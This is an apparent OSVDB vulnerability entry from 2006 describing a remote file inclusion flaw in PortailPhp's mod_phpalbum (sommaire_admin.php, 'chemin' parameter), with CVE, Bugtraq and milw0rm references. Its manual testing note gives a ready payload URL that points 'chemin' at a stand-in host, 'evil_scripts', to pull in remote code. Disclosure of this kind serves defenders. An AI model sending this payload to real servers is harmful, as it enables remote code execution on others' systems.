PortailPhp mod_phpalbum sommaire_admin.php chemin Variable Remote File Inclusion

2006-08-29T07:27:31
ID OSVDB:29847
Type osvdb
Reporter OSVDB
Modified 2006-08-29T07:27:31

Description

Manual Testing Notes

http://[target]/[path]/mod_phpalbum/sommaire_admin.php?chemin=http://evil_scripts?

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-08/0530.html Generic Exploit URL: http://www.milw0rm.com/exploits/2271 CVE-2006-4498 Bugtraq ID: 19750